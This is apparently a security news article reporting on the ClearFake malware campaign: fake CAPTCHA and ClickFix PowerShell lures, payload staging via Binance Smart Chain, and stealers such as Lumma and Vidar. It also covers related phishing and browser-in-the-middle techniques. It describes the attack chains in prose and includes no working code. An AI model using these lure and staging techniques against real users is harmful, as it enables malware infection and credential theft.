The individuals behind the ClearFake campaign have been observed utilizing fake reCAPTCHA or Cloudflare Turnstile verifications as a means to deceive users into downloading malicious software, including Lumma Stealer and Vidar Stealer.
ClearFake, a threat activity cluster first identified in July 2023, is known for employing fake web browser update baits on compromised WordPress sites as a vector for malware distribution.
This campaign is also recognized for its use of EtherHiding, a technique that leverages Binance’s Smart Chain (BSC) contracts to fetch the next-stage payload, making the attack chain more resilient. The ultimate goal of these infection chains is to deliver information-stealing malware capable of targeting both Windows and macOS systems.
As of May 2024, ClearFake attacks have incorporated a social engineering ploy known as ClickFix, which involves deceiving users into running malicious PowerShell code under the guise of addressing a non-existent technical issue.
According to Sekoia’s analysis, “Although this new ClearFake variant continues to rely on the EtherHiding technique and the ClickFix tactic, it has introduced additional interactions with the Binance Smart Chain.”
“By using smart contract’s Application Binary Interfaces, these interactions involve loading multiple JavaScript codes and additional resources that fingerprint the victim’s system, as well as downloading, decrypting and displaying the ClickFix lure.”
The latest iteration of the ClearFake framework marks a significant evolution, adopting Web3 capabilities to resist analysis and encrypting the ClickFix-related HTML code.
The updated multi-stage attack sequence is initiated when a victim visits a compromised site, leading to the retrieval of an intermediate JavaScript code from BSC. The loaded JavaScript is responsible for fingerprinting the system and fetching the encrypted ClickFix code hosted on Cloudflare Pages.
Should the victim execute the malicious PowerShell command, it leads to the deployment of Emmenhtal Loader (aka PEAKLIGHT), which subsequently drops Lumma Stealer.
Sekoia observed an alternate ClearFake attack chain in late January 2025 that served a PowerShell loader responsible for installing Vidar Stealer. As of last month, at least 9,300 websites have been infected with ClearFake.
“The operator has consistently updated the framework code, lures, and distributed payloads on a daily basis,” it added. “ClearFake execution now relies on multiple pieces of data stored in the Binance Smart Chain, including JavaScript code, AES key, URLs hosting lure HTML files, and ClickFix PowerShell commands.”
“The number of websites compromised by ClearFake suggests that this threat remains widespread and affects many users worldwide. In July 2024, […] approximately 200,000 unique users were potentially exposed to ClearFake lures encouraging them to download malware.”
The development comes as over 100 auto dealership sites have been discovered compromised with ClickFix lures that lead to the deployment of SectopRAT malware.
“Where this infection on the auto dealerships happened was not on the dealership’s own website, but a third-party video service,” said security researcher Randy McEoin, who detailed some of the earliest ClearFake campaigns in 2023, describing the incident as an instance of a supply chain attack.
The video service in question is LES Automotive (“idostream[.]com”), which has since removed the malicious JavaScript injection from the site.
The findings also coincide with the discovery of several phishing campaigns that are engineered to push various malware families and conduct credential harvesting –
- Using virtual hard disk (VHD) files embedded within archive file attachments in email messages to distribute Venom RAT by means of a Windows batch script
- Using Microsoft Excel file attachments that exploit a known security flaw (CVE-2017-0199) to download an HTML Application (HTA) that then uses Visual Basic Script (VBS) to fetch an image, which contains another payload responsible for decoding and launching AsyncRAT and Remcos RAT
- Exploiting misconfigurations in Microsoft 365 infrastructure to take control of tenants, create new administrative accounts, and deliver phishing content that bypasses email security protections and ultimately facilitates credential harvesting and account takeover (ATO)
As social engineering campaigns continue to become more sophisticated, it’s essential that organizations and businesses stay ahead of the curve and implement robust authentication and access-control mechanisms against Adversary-in-the-Middle (AitM) and Browser-in-the-Middle (BitM) techniques that allow attackers to hijack accounts.
“A pivotal benefit of employing a BitM framework lies in its rapid targeting capability, allowing it to reach any website on the web in a matter of seconds and with minimal configuration,” Google-owned Mandiant said in a report published this week.
“Once an application is targeted through a BitM tool or framework, the legitimate site is served through an attacker-controlled browser. This makes the distinction between a legitimate and a fake site exceptionally challenging for a victim. From the perspective of an adversary, BitM allows for a simple yet effective means of stealing sessions protected by MFA.”
